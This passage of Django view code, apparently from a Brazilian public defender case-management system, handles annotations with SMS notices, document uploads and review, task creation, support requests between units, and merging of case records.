return HttpResponseRedirect(self.request.META.get('HTTP_REFERER', '/'))\r\n\r\n def form_valid(self, form):\r\n\r\n anotacao = form.save(commit=False)\r\n atendimento = AtendimentoDefensor.objects.only('id', 'inicial_id').get(numero=self.kwargs['atendimento_numero'])\r\n\r\n # atualiza objeto com dados adicionais\r\n anotacao.origem = atendimento\r\n anotacao.inicial = atendimento.at_inicial\r\n anotacao.cadastrado_por = self.request.user.servidor\r\n anotacao.tipo = self.atendimento_tipo\r\n if not settings.SIGLA_UF.upper() == 'AM':\r\n qualificacao = form.cleaned_data['qualificacao']\r\n\r\n if (qualificacao.eh_qualificacao_sms and (not config.USAR_SMS or not config.SERVICO_SMS_DISPONIVEL)):\r\n mensagem = \"O envio de SMS está desabilitado no sistema!\"\r\n if self.request.is_ajax():\r\n return JsonResponse({'success': False, 'message': mensagem, 'anotacao': Util.object_to_dict(anotacao)}) # noqa: E501\r\n else:\r\n messages.error(self.request, mensagem)\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n enviar_sms = (qualificacao.eh_qualificacao_sms and config.USAR_SMS and config.SERVICO_SMS_DISPONIVEL)\r\n\r\n if (enviar_sms):\r\n # Substitui as palavras chaves no modelo MENSAGEM_SMS_ANOTACAO\r\n historico = config.MENSAGEM_SMS_ANOTACAO.replace(\r\n \"SMS_CONTEUDO_ANOTACAO\", form.cleaned_data['historico'], 1\r\n ).replace(\r\n \"SMS_DEF_SIGLA\", settings.SIGLA_INSTITUICAO\r\n )\r\n # Remove os acentos da mensagem se assim foi configurado\r\n if config.SMS_REMOVER_ACENTOS:\r\n historico = Util.unaccent(historico)\r\n anotacao.historico = historico\r\n\r\n # só registra dados de atendimento em anotações\r\n if self.atendimento_tipo == Atendimento.TIPO_ANOTACAO:\r\n anotacao.atendido_por = self.request.user.servidor\r\n anotacao.data_atendimento = timezone.now()\r\n\r\n if not settings.SIGLA_UF.upper() == 'AM':\r\n # obtem defensor/defensoria a partir da atuação\r\n anotacao.defensor = form.cleaned_data['atuacao'].defensor\r\n anotacao.defensoria = form.cleaned_data['atuacao'].defensoria\r\n\r\n if enviar_sms:\r\n telefone = atendimento.telefone_para_sms\r\n\r\n # Se o telefone não foi encontrado, algo deu errado\r\n # Mostra uma mensagem de erro\r\n if not telefone['telefone']:\r\n mensagem = \"Não foi possível enviar o SMS.\"\r\n if telefone['no_valid_cell']:\r\n mensagem += \" Nenhum telefone válido foi encontrado.\"\r\n if self.request.is_ajax():\r\n return JsonResponse({\r\n 'success': False,\r\n 'message': mensagem,\r\n 'anotacao': Util.object_to_dict(anotacao)\r\n })\r\n else:\r\n messages.error(self.request, mensagem)\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n telefone_numero = \"55{}{}\".format(telefone['telefone'].ddd, telefone['telefone'].numero)\r\n envio = envia_sms(historico, telefone_numero)\r\n\r\n if not (envio.status_code >= 200 and envio.status_code < 300):\r\n mensagem = \"Não foi possível enviar o SMS! Código do erro: {}\".format(envio.status_code)\r\n if self.request.is_ajax():\r\n return JsonResponse({\r\n 'success': False,\r\n 'message': mensagem,\r\n 'anotacao': Util.object_to_dict(anotacao)\r\n })\r\n else:\r\n messages.error(self.request, mensagem)\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n super(AnotacaoCreateView, self).form_valid(form)\r\n\r\n # salva documento vinculado a anotação\r\n if self.request.FILES:\r\n\r\n documento = AtendimentoDocumento(\r\n atendimento=self.object,\r\n data_enviado=timezone.now(),\r\n enviado_por=self.request.user.servidor)\r\n\r\n form_documento = DocumentoForm(self.request.POST, self.request.FILES, instance=documento)\r\n\r\n if form_documento.is_valid():\r\n form_documento.save()\r\n\r\n # força limpeza da árvore do atendimento\r\n if hasattr(atendimento.at_inicial, 'arvore'):\r\n atendimento.at_inicial.arvore.ativo = False\r\n atendimento.at_inicial.arvore.save()\r\n\r\n mensagem = \"Registro salvo com sucesso!\"\r\n\r\n if self.request.is_ajax():\r\n return JsonResponse({'success': True, 'message': mensagem, 'anotacao': Util.object_to_dict(anotacao)})\r\n else:\r\n messages.success(self.request, mensagem)\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n def get_success_url(self):\r\n return self.request.META.get('HTTP_REFERER', '/')\r\n\r\n\r\nclass NotificacaoCreateView(AnotacaoCreateView):\r\n form_class = NotificacaoForm\r\n template_name = \"atendimento/atender_modal_notificacao_form.html\"\r\n atendimento_tipo = Atendimento.TIPO_NOTIFICACAO\r\n\r\n def get_context_data(self, **kwargs):\r\n\r\n context = super(NotificacaoCreateView, self).get_context_data(**kwargs)\r\n context['form_name'] = 'NotificacaoForm'\r\n context['notificar'] = True\r\n context['pode_notificar_assistido'] = False\r\n\r\n # Se houver, insere informações do documento que está sendo recusado\r\n if self.request.GET.get('documento_id'):\r\n context['documento'] = AtendimentoDocumento.objects.get(\r\n id=self.request.GET.get('documento_id'),\r\n analisar=True\r\n )\r\n\r\n # Verifica se o assistido pode ser notificado\r\n if config.USAR_NOTIFICACOES_ASSISTIDO_VIA_CHATBOT and self.atendimento:\r\n context['pode_notificar_assistido'] = self.atendimento.requerente.pessoa.aderiu_luna_chatbot\r\n\r\n return context\r\n\r\n def form_valid(self, form):\r\n\r\n result = super(NotificacaoCreateView, self).form_valid(form)\r\n\r\n assistido = Pessoa.objects.get(\r\n id=self.request.POST.get('assistido')\r\n )\r\n\r\n self.object.add_pessoa(\r\n pessoa_id=assistido.id,\r\n tipo=AtendimentoPessoa.TIPO_NOTIFICACAO,\r\n responsavel=False,\r\n vincular_ao_inicial=False\r\n )\r\n\r\n # Se houver, registra recusa de documento vinculado\r\n if self.request.POST.get('documento_id'):\r\n\r\n documento = AtendimentoDocumento.objects.get(\r\n id=self.request.POST.get('documento_id'),\r\n analisar=True\r\n )\r\n\r\n documento.analisar = False\r\n documento.arquivo = None\r\n documento.data_enviado = None\r\n documento.enviado_por = None\r\n documento.save()\r\n\r\n chatbot_notificar_requerente_atendimento.apply_async(\r\n kwargs={\r\n 'numero': self.object.numero,\r\n 'pessoa_id': assistido.id\r\n },\r\n queue='sobdemanda'\r\n )\r\n\r\n return result\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_coletivo')\r\ndef salvar_comunidade(request, atendimento_numero):\r\n from assistido.models import Pessoa\r\n from assistido.forms import CadastrarEndereco, PessoaForm\r\n\r\n # resposta padrão\r\n resposta = {'success': False, 'errors': {}}\r\n
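# rough sketch of the ajax payload this view expects (field names inferred from the handling below, values illustrative only):\r\n #   {'id': None, 'cpf': '12345678901', 'municipio': 1, 'bairro': 'Centro', 'estado': 1}\r\n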
errors = []\r\n\r\n if request.method == 'POST':\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n # carrega e trata dados recebidos via ajax\r\n dados = Dados(request.body)\r\n dados['tipo'] = constantes.TIPO_PESSOA_JURIDICA\r\n\r\n # tenta carregar registro, se nao conseguir carrega novo\r\n try:\r\n pessoa = Pessoa.objects.get(id=dados['id'])\r\n except Pessoa.DoesNotExist:\r\n pessoa = Pessoa()\r\n\r\n # verifica se já existe outra pessoa com o cpf informado\r\n if dados['cpf']:\r\n cpf_existe = Pessoa.objects.filter(cpf=dados['cpf']).exclude(id=dados['id'])\r\n else:\r\n cpf_existe = False\r\n\r\n if cpf_existe:\r\n\r\n errors.append('O cpf/cnpj informado já está vinculado a outra pessoa!')\r\n\r\n else:\r\n\r\n # recupera id do bairro a partir do municipio/nome\r\n if dados.get('bairro') is not None:\r\n try:\r\n bairro, msg = Bairro.objects.get_or_create(\r\n municipio_id=dados.get('municipio'),\r\n nome__iexact=dados.get('bairro'),\r\n desativado_em=None,\r\n defaults={\r\n # necessário por ter usado uma func no get_or_create para esse field\r\n 'nome': dados.get('bairro')\r\n }\r\n )\r\n except Exception:\r\n bairro = Bairro.objects.filter(\r\n municipio_id=dados.get('municipio'),\r\n nome__iexact=dados.get('bairro'),\r\n desativado_em=None,\r\n ).first()\r\n\r\n dados.set('bairro', bairro.id)\r\n\r\n pessoa_form = PessoaForm(dados.get_all(), instance=pessoa)\r\n\r\n if pessoa_form.is_valid():\r\n # TODO: Verificar consistencia ou remover\r\n novo = (pessoa.id == None) # noqa\r\n pessoa = pessoa_form.save()\r\n\r\n try:\r\n\r\n endereco_form = CadastrarEndereco(\r\n dados.get_all(),\r\n instance=pessoa.endereco,\r\n initial={\r\n 'estado': dados.get('estado'),\r\n 'municipio': dados.get('municipio')\r\n })\r\n\r\n except KeyError:\r\n endereco_form = CadastrarEndereco(dados.get_all(), instance=pessoa.endereco)\r\n\r\n if endereco_form.is_valid():\r\n pessoa.enderecos.add(endereco_form.save())\r\n\r\n else:\r\n # inclui erros no array de erros\r\n errors.append([(k, v[0]) for k, v in pessoa_form.errors.items()])\r\n\r\n if len(errors) == 0:\r\n\r\n resposta['success'] = True\r\n\r\n coletivo, msg = Coletivo.objects.get_or_create(atendimento=atendimento.at_inicial)\r\n coletivo.comunidade = pessoa\r\n coletivo.save()\r\n\r\n else:\r\n\r\n resposta['errors'] = errors\r\n\r\n resposta['id'] = pessoa.id\r\n resposta['pessoa'] = pessoa.to_dict()\r\n\r\n return JsonResponse(resposta)\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_documento')\r\ndef salvar_documento(request, atendimento_numero):\r\n\r\n if request.method == 'POST':\r\n\r\n salvou, documento = salvar_documento_pre(request, atendimento_numero)\r\n\r\n if salvou and documento and documento.documento_online:\r\n\r\n if documento.atendimento.tipo == Atendimento.TIPO_ATIVIDADE:\r\n atendimento = documento.atendimento.origem\r\n else:\r\n atendimento = documento.atendimento\r\n\r\n sda = ServiceDocumentoAtendimento(documento)\r\n\r\n sda.preencher({\r\n 'defensoria': documento.documento_online.grupo_dono,\r\n 'atendimento': atendimento.at_defensor,\r\n 'servidor': request.user.servidor,\r\n 'pessoa': documento.pessoa,\r\n 'hoje': date.today(),\r\n })\r\n\r\n if documento.atendimento.tipo == Atendimento.TIPO_ATIVIDADE:\r\n\r\n for participante in documento.atendimento.participantes.all():\r\n documento.documento_online.adicionar_pendencia_de_assinatura_por_usuario(\r\n grupo=documento.atendimento.origem.defensor.defensoria,\r\n assinado_por=participante.usuario,\r\n 
cadastrado_por=request.user)\r\n\r\n if salvou and documento and documento.pendente:\r\n # Notifica assistido via chatbot Luna\r\n chatbot_notificar_requerente_documento.apply_async(\r\n kwargs={'documento_id': documento.id},\r\n queue='sobdemanda'\r\n )\r\n\r\n if request.is_ajax():\r\n\r\n documento_dict = None\r\n\r\n if salvou and documento:\r\n\r\n url = None\r\n filetype = None\r\n\r\n if documento.arquivo:\r\n url = documento.arquivo.url\r\n filetype, encoding = mimetypes.guess_type(documento.arquivo.url, strict=True)\r\n\r\n enviado_por_nome = None\r\n enviado_por_username = None\r\n\r\n if documento.enviado_por:\r\n enviado_por_nome = documento.enviado_por.nome\r\n enviado_por_username = documento.enviado_por.usuario.username\r\n\r\n cadastrado_por_nome = None\r\n cadastrado_por_username = None\r\n\r\n if documento.cadastrado_por:\r\n cadastrado_por_nome = documento.cadastrado_por.nome\r\n cadastrado_por_username = documento.cadastrado_por.usuario.username\r\n\r\n documento_dict = {\r\n 'id': documento.id,\r\n 'documento_online_id': documento.documento_online_id,\r\n 'nome': documento.nome,\r\n 'arquivo': url,\r\n 'enviado_por_nome': enviado_por_nome,\r\n 'enviado_por_username': enviado_por_username,\r\n 'data_enviado': documento.data_enviado,\r\n 'data_cadastro': documento.data_cadastro,\r\n 'cadastrado_por_username': cadastrado_por_username,\r\n 'cadastrado_por_nome': cadastrado_por_nome,\r\n 'filetype': filetype\r\n }\r\n\r\n resposta = {\r\n 'success': documento_dict is not None,\r\n 'errors': [(k, v[0]) for k, v in documento.items()] if documento and not salvou else [],\r\n 'documento': documento_dict\r\n }\r\n\r\n return JsonResponse(resposta)\r\n\r\n else:\r\n\r\n return redirect(request.POST['next'])\r\n\r\n else:\r\n\r\n raise Http404\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_documento')\r\ndef salvar_documento_pre(request, atendimento_numero, **kwargs):\r\n if request.method == 'POST':\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n if request.POST.get('id'):\r\n documento = AtendimentoDocumento.objects.get(id=request.POST.get('id'))\r\n else:\r\n documento = AtendimentoDocumento(atendimento=atendimento, cadastrado_por=request.user.servidor)\r\n\r\n if request.FILES:\r\n\r\n documento.data_enviado = datetime.now()\r\n documento.enviado_por = request.user.servidor\r\n\r\n # Se possuía versão assinada, desativa e remove vínculo\r\n if documento.documento_assinado:\r\n documento.documento_assinado.desativar(usuario=request.user)\r\n documento.documento_assinado = None\r\n\r\n form = DocumentoForm(request.POST, request.FILES, instance=documento)\r\n\r\n if form.is_valid():\r\n return True, form.save()\r\n else:\r\n return False, form.errors\r\n\r\n return False, None\r\n\r\n\r\n@login_required\r\ndef auto_criar_documento_ged(request, atendimento_numero):\r\n\r\n cpf = request.GET.get('cpf')\r\n\r\n if not cpf or len(cpf) != 11:\r\n messages.error(request, 'Não foi possível criar o documento de ciência! Verifique se o cpf/cnpj do assistido foi informado corretamente.') # noqa: E501\r\n\r\n from .models import PessoaAssistida\r\n pessoa = PessoaAssistida.objects.ativos().filter(pessoa_ptr__cpf=cpf).first()\r\n\r\n atendimento_defensor = AtendimentoDefensor.objects.filter(numero=atendimento_numero).first()\r\n\r\n form = TabDocumentoForm(request.POST)\r\n\r\n if form.is_valid():\r\n\r\n data = form.cleaned_data\r\n modelo_ged = data['modelo']\r\n assunto_ged = data['assunto']\r\n\r\n try:\r\n criar_documento_ged_para_o_atendimento(\r\n modelo_ged,\r\n atendimento_defensor,\r\n pessoa,\r\n request.user,\r\n assunto=assunto_ged,\r\n liberar_para_assinar=True\r\n )\r\n except Exception as e:\r\n erro = str(e.args).replace('(', '').replace(')', '').replace(',', '.')\r\n\r\n messages.error(request, f'Não foi possível criar o documento GED! Erro técnico: < {erro} > ')\r\n\r\n return redirect('{}#/documentos'.format(\r\n reverse('atendimento_atender', args=[atendimento_numero]),\r\n ))\r\n\r\n\r\nclass DocumentoCriarParaAtendimento(SingleAtendimentoDefensorObjectMixin, DocumentoCriar):\r\n atendimentodefensor_queryset = AtendimentoDefensor.objects.only('numero')\r\n form_class = CriarDocumentoOnlineParaAtendimentoForm\r\n\r\n @method_decorator(permission_required('atendimento.add_documento'))\r\n def dispatch(self, request, *args, **kwargs):\r\n return super(DocumentoCriarParaAtendimento, self).dispatch(request, *args, **kwargs)\r\n\r\n def get_form_action(self):\r\n kwargs = {self.atendimentodefensor_slug_url_kwarg: self.atendimentodefensor_object.numero}\r\n action = reverse('atendimento_ged_criar', kwargs=kwargs)\r\n return action\r\n\r\n def get_form_kwargs(self):\r\n kwargs = super(DocumentoCriarParaAtendimento, self).get_form_kwargs()\r\n kwargs.update({\r\n 'atendimento': self.atendimentodefensor_object\r\n }\r\n )\r\n return kwargs\r\n\r\n def get_initial(self):\r\n\r\n initial = super(DocumentoCriarParaAtendimento, self).get_initial()\r\n grupo = self.atendimentodefensor_object.defensoria\r\n\r\n initial.update({\r\n 'grupo': grupo,\r\n })\r\n\r\n if self.request.GET.get('modelo_documento'):\r\n modelo_documento = DocumentoGED.admin_objects.get(pk_uuid=self.request.GET.get('modelo_documento'))\r\n initial.update({\r\n 'tipo_documento': modelo_documento.tipo_documento_id,\r\n 'modelo_documento': modelo_documento.pk_uuid,\r\n })\r\n\r\n return initial\r\n\r\n def form_valid(self, form):\r\n ret = super(DocumentoCriarParaAtendimento, self).form_valid(form)\r\n atendimento = self.atendimentodefensor_object.atendimento_ptr\r\n documento_online = self.object\r\n pessoa = form.cleaned_data['pessoa']\r\n pasta = form.cleaned_data.get('pasta', None)\r\n documento_atendimento = AtendimentoDocumento(\r\n atendimento=atendimento,\r\n documento_online=documento_online,\r\n cadastrado_por=self.request.user.servidor,\r\n nome=documento_online.assunto,\r\n pessoa=pessoa,\r\n pasta=pasta\r\n )\r\n documento_atendimento.save()\r\n\r\n context_conteudo = {\r\n 'defensoria': documento_online.grupo_dono,\r\n 'atendimento': self.atendimentodefensor_object,\r\n 'servidor': self.request.user.servidor,\r\n 'pessoa': pessoa,\r\n 'hoje': date.today(),\r\n }\r\n preencher_campos_ged(documento=documento_online, context_conteudo=context_conteudo, fallback_to_conteudo=True)\r\n documento_online.save()\r\n\r\n return ret\r\n\r\n\r\nclass DocumentoCriarParaAtendimentoViaModeloPublico(DocumentoCriarParaAtendimento):\r\n form_class = CriarDocumentoOnlineParaAtendimentoViaModeloPublicoForm\r\n\r\n def get_form_action(self):\r\n kwargs = {self.atendimentodefensor_slug_url_kwarg: self.atendimentodefensor_object.numero}\r\n action = reverse('atendimento_ged_criar_via_modelo_publico', kwargs=kwargs)\r\n return action\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_documento')\r\ndef agendar_documento(request):\r\n\r\n if request.method == 'POST' and request.POST.get('id'):\r\n\r\n documento = AtendimentoDocumento.objects.get(id=request.POST.get('id'))\r\n form = AgendarDocumentoForm(request.POST, instance=documento)\r\n\r\n if form.is_valid():\r\n\r\n documento = form.save(commit=False)\r\n\r\n if request.FILES:\r\n\r\n if documento.documento_resposta:\r\n resposta = documento.documento_resposta\r\n else:\r\n resposta = AtendimentoDocumento(\r\n atendimento=documento.atendimento,\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n
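# the uploaded file is saved as its own '(RESPOSTA)' document and linked back through documento_resposta below\r\n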
resposta.nome = '{} (RESPOSTA)'.format(documento.nome).upper()\r\n resposta.data_enviado = datetime.now()\r\n resposta.enviado_por = request.user.servidor\r\n resposta.ativo = True\r\n\r\n form_resposta = DocumentoRespostaForm(request.POST, request.FILES, instance=resposta)\r\n\r\n if form_resposta.is_valid():\r\n resposta = form_resposta.save()\r\n\r\n documento.documento_resposta = resposta\r\n\r\n documento.save()\r\n\r\n return redirect(request.POST['next'])\r\n\r\n raise Http404\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_documento')\r\ndef analisar_documento(request):\r\n\r\n if request.method == 'POST' and request.POST.get('id'):\r\n\r\n documento = AtendimentoDocumento.objects.get(\r\n id=request.POST.get('id'),\r\n analisar=True\r\n )\r\n\r\n if request.POST.get('aceitar') == 'true':\r\n documento.data_analise = datetime.now()\r\n documento.analisado_por = request.user.servidor\r\n documento.analisar = False\r\n documento.save()\r\n\r\n return redirect(request.POST['next'])\r\n\r\n raise Http404\r\n\r\n\r\n@login_required\r\n@permission_required('nucleo.add_resposta')\r\ndef salvar_formulario(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n dados = simplejson.loads(request.body)\r\n success = True\r\n\r\n formulario = FormularioNucleo.objects.get(id=dados['id'])\r\n\r\n novo = not RespostaNucleo.objects.filter(\r\n atendimento=atendimento.at_inicial,\r\n pergunta__formulario=formulario\r\n ).exists()\r\n\r\n for pergunta in dados['perguntas']:\r\n\r\n RespostaNucleo.objects.update_or_create(\r\n atendimento=atendimento.at_inicial,\r\n pergunta_id=pergunta['id'],\r\n defaults={\r\n 'texto': pergunta['resposta']\r\n }\r\n )\r\n\r\n if novo and formulario.gerar_alerta_em_atendimento:\r\n\r\n descricao = ''\r\n\r\n for pergunta in dados['perguntas']:\r\n descricao += '\\n\\n    {}\\n    {}\\n\\n    '.format(\r\n pergunta['texto'],\r\n pergunta['resposta'] if pergunta['resposta'] is not None else 'Não informado'\r\n )\r\n\r\n Tarefa.objects.create(\r\n atendimento=atendimento.at_inicial,\r\n resposta_para=atendimento.defensoria,\r\n setor_responsavel=formulario.nucleo.defensoria_set.ativos().first(),\r\n titulo=formulario.texto,\r\n descricao=descricao,\r\n data_inicial=date.today(),\r\n data_final=None,\r\n prioridade=Tarefa.PRIORIDADE_ALERTA,\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n return JsonResponse({'success': success})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_tarefa')\r\n@reversion.create_revision(atomic=False)\r\ndef salvar_tarefa(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n dados = Dados(request.body)\r\n errors = []\r\n novo = True\r\n\r\n if dados.get('id'):\r\n tarefa = Tarefa.objects.get(id=dados.get('id'))\r\n novo = False\r\n else:\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n tarefa = Tarefa(atendimento=atendimento, cadastrado_por=request.user.servidor)\r\n\r\n form = TarefaForm(dados.get_all(), instance=tarefa)\r\n\r\n if form.is_valid():\r\n\r\n tarefa = form.save()\r\n\r\n reversion.set_user(request.user)\r\n reversion.set_comment(Util.get_comment_save(request.user, tarefa, novo))\r\n\r\n else:\r\n errors.append([(k, v[0]) for k, v in form.errors.items()])\r\n\r\n return JsonResponse({'success': (len(errors) == 0), 'errors': errors, 'id': tarefa.id})\r\n\r\n\r\n@login_required\r\ndef solicitar_nucleo_form(request, atendimento_numero):\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_nucleos.html\",\r\n context={\r\n 'atendimento_numero': atendimento_numero,\r\n })\r\n\r\n\r\n@login_required\r\ndef solicitar_nucleo(request, atendimento_numero):\r\n from defensor.models import Atuacao\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n atuacao_origem = Atuacao.objects.get(id=request.POST.get('atuacao'))\r\n\r\n atuacao_destino = Atuacao.objects.filter(\r\n defensoria_id=request.POST.get('defensoria'),\r\n tipo=Atuacao.TIPO_TITULARIDADE,\r\n ativo=True\r\n ).order_by(\r\n '-defensor__eh_defensor',\r\n 'data_inicial'\r\n ).first()\r\n\r\n agora = datetime.now()\r\n\r\n # se o atendimento de origem não tiver qualificação, assume qualificação do pedido de apoio\r\n if atendimento.qualificacao_id:\r\n qualificacao_id = atendimento.qualificacao_id\r\n else:\r\n qualificacao_id = request.POST.get('qualificacao')\r\n\r\n # cria solicitação do apoio\r\n pedido = AtendimentoDefensor(\r\n tipo=Atendimento.TIPO_RETORNO,\r\n inicial=atendimento.at_inicial,\r\n origem=atendimento,\r\n data_agendamento=agora,\r\n data_atendimento=agora,\r\n cadastrado_por=request.user.servidor,\r\n agendado_por=request.user.servidor,\r\n atendido_por=request.user.servidor,\r\n defensor=atuacao_origem.titular if atuacao_origem.titular else atuacao_origem.defensor,\r\n substituto=atuacao_origem.defensor if atuacao_origem.titular else None,\r\n defensoria=atuacao_origem.defensoria,\r\n qualificacao_id=qualificacao_id)\r\n\r\n sucesso = False\r\n form = NucleoPedidoForm(request.POST, instance=pedido)\r\n\r\n if form.is_valid():\r\n\r\n with transaction.atomic():\r\n\r\n pedido = form.save()\r\n\r\n # cria resposta do apoio\r\n resposta = AtendimentoDefensor(\r\n tipo=Atendimento.TIPO_NUCLEO,\r\n inicial=pedido.at_inicial,\r\n origem=pedido,\r\n
cadastrado_por=request.user.servidor,\r\n agendado_por=request.user.servidor,\r\n defensor=atuacao_destino.defensor)\r\n\r\n form_resposta = NucleoRespostaForm(request.POST, instance=resposta)\r\n\r\n if form_resposta.is_valid():\r\n\r\n resposta = form_resposta.save()\r\n\r\n # se possuir documentos, os vincula à solicitação do apoio\r\n if 'documentos' in request.POST:\r\n\r\n # remove ids de documento em duplicidade\r\n documentos = []\r\n for documento in request.POST.getlist('documentos'):\r\n if documento not in documentos:\r\n documentos.append(documento)\r\n\r\n for documento in documentos:\r\n\r\n doc_original = AtendimentoDocumento.objects.get(id=documento)\r\n\r\n AtendimentoDocumento.objects.create(\r\n atendimento=pedido,\r\n pessoa=doc_original.pessoa,\r\n modelo=doc_original.modelo,\r\n documento=doc_original.documento,\r\n documento_online=doc_original.documento_online,\r\n arquivo=doc_original.arquivo,\r\n nome=doc_original.nome,\r\n data_enviado=doc_original.data_enviado, # mantem data envio original\r\n enviado_por=doc_original.enviado_por, # mantem usuario que enviou original\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n # se for para o núcleo de diligência, vincula pessoa à solicitação do apoio\r\n if request.POST.get('pessoa') and resposta.defensoria.nucleo.diligencia:\r\n\r\n pedido.add_pessoa(\r\n pessoa_id=request.POST.get('pessoa'),\r\n tipo=AtendimentoPessoa.TIPO_DILIGENCIA,\r\n responsavel=False,\r\n vincular_ao_inicial=False\r\n )\r\n\r\n titulo_tarefa = 'Diligência para {0}'.format(pedido.partes.first())\r\n\r\n else:\r\n\r\n titulo_tarefa = resposta.qualificacao.titulo\r\n\r\n # cria tarefa para acompanhamento do apoio\r\n tarefa = Tarefa(\r\n atendimento=pedido,\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n form_tarefa = TarefaForm({\r\n 'prioridade': Tarefa.PRIORIDADE_ALERTA,\r\n 'titulo': titulo_tarefa.upper(),\r\n 'descricao': pedido.historico,\r\n 'data_inicial': date.today(),\r\n 'data_final': resposta.data_agendamento.date(),\r\n 'resposta_para': pedido.defensoria_id,\r\n 'setor_responsavel': resposta.defensoria_id\r\n }, instance=tarefa)\r\n\r\n if form_tarefa.is_valid():\r\n form_tarefa.save()\r\n sucesso = True\r\n else:\r\n transaction.set_rollback(True)\r\n\r\n else:\r\n transaction.set_rollback(True)\r\n\r\n if sucesso:\r\n messages.success(request, u'Pedido de apoio enviado com sucesso!')\r\n else:\r\n messages.error(request, u'Erro ao salvar, verifique se todos campos foram preenchidos corretamente!')\r\n\r\n if 'atendimento/recepcao/marcados/' in request.META.get('HTTP_REFERER', '/'):\r\n return redirect(request.META.get('HTTP_REFERER', '/'))\r\n\r\n elif request.POST.get('next'):\r\n return redirect(request.POST['next'])\r\n\r\n else:\r\n return redirect('{}#/historico'.format(reverse('atendimento_atender', args=[atendimento.numero])))\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef visualizar(request, atendimento_id):\r\n pass\r\n\r\n\r\n@login_required\r\ndef listar_atendimento_documentos_pendentes(request):\r\n servidor = request.user.servidor\r\n\r\n if hasattr(request.GET, 'submit'):\r\n page = 1\r\n else:\r\n page = request.GET.get('page')\r\n\r\n form = BuscarAtendimentoDocumentosForm(request.GET)\r\n\r\n if form.is_valid():\r\n\r\n filtro = request.GET.get('filtro')\r\n filtro_numero = re.sub('[^0-9]', '', filtro)\r\n\r\n comarca = request.session.get('comarca')\r\n\r\n atendimentos_lst = AtendimentoDefensor.objects.filter(\r\n Q(documento__ativo=True) &\r\n 
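# documento__arquivo='' keeps only pending documents: the record exists but no file was uploaded yet\r\n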
Q(documento__arquivo='') &\r\n Q(defensoria__comarca_id=comarca) &\r\n Q(ativo=True) &\r\n Q(remarcado=None) &\r\n (Q(tipo=Atendimento.TIPO_INICIAL) | Q(tipo=Atendimento.TIPO_RETORNO))\r\n ).distinct().order_by('-data_agendamento', '-data_atendimento')\r\n\r\n if len(filtro_numero) == 12: # Numero do Atendimento\r\n\r\n atendimentos_lst = atendimentos_lst.filter(\r\n numero=filtro_numero\r\n )\r\n\r\n elif len(filtro_numero) == 11: # Numero do CPF\r\n\r\n atendimentos_lst = atendimentos_lst.filter(\r\n partes__pessoa__cpf=filtro,\r\n partes__ativo=True\r\n )\r\n\r\n else:\r\n\r\n atendimentos_lst = atendimentos_lst.filter(\r\n partes__pessoa__nome__icontains=filtro,\r\n partes__ativo=True\r\n )\r\n\r\n paginacao = Paginator(atendimentos_lst, 25)\r\n\r\n try:\r\n atendimentos = paginacao.page(page)\r\n except PageNotAnInteger:\r\n atendimentos = paginacao.page(1)\r\n except EmptyPage:\r\n atendimentos = paginacao.page(paginacao.num_pages)\r\n\r\n angular = 'BuscarCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/busca_docs_pendentes.html\", context=locals())\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef unificar(request, atendimento_principal, atendimento_secundario):\r\n\r\n primario = AtendimentoDefensor.objects.get(numero=atendimento_principal)\r\n secundario = AtendimentoDefensor.objects.get(numero=atendimento_secundario)\r\n\r\n # Pode unificar se principal for atendimento inicial ou de processo e secundário for processo\r\n if (primario.tipo in [Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA, Atendimento.TIPO_PROCESSO] and\r\n secundario.tipo == Atendimento.TIPO_PROCESSO): # noqa: E501\r\n\r\n # Move relacionamentos dependentes para novo agendamento\r\n service = AtendimentoService(secundario)\r\n service.transferir_relacionamentos(\r\n atendimento_destino=primario,\r\n copiar_pessoas=True,\r\n transferir_pessoas=False\r\n )\r\n\r\n secundario.partes.update(ativo=False) # desativa pessoas do atendimento secundário\r\n secundario.ativo = False # desativa atendimento para processo\r\n secundario.save()\r\n\r\n processo = request.GET.get('processo', '')\r\n messages.success(request, u'Processo nº %s unificado ao atendimento atual!' % processo)\r\n\r\n # Pode unificar se principal e secundário forem inicial\r\n elif (primario.tipo in [Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA] and\r\n secundario.tipo in [Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA]):\r\n\r\n service = AtendimentoService(secundario)\r\n service.transferir_relacionamentos(\r\n atendimento_destino=primario,\r\n copiar_pessoas=True,\r\n transferir_pessoas=False\r\n )\r\n\r\n hoje = datetime.now()\r\n dia_um = datetime(hoje.year, hoje.month, 1)\r\n\r\n # se não realizado ou realizado no mes vigente, vira tipo retorno\r\n if not secundario.data_atendimento or secundario.data_atendimento > dia_um:\r\n secundario.tipo = Atendimento.TIPO_RETORNO\r\n\r\n secundario.partes.update(ativo=False) # desativa pessoas do atendimento secundário\r\n secundario.inicial = primario # vincula atendimento duplicado ao atendimento principal\r\n secundario.save()\r\n\r\n messages.success(request, u'Atendimento nº %s unificado ao atendimento 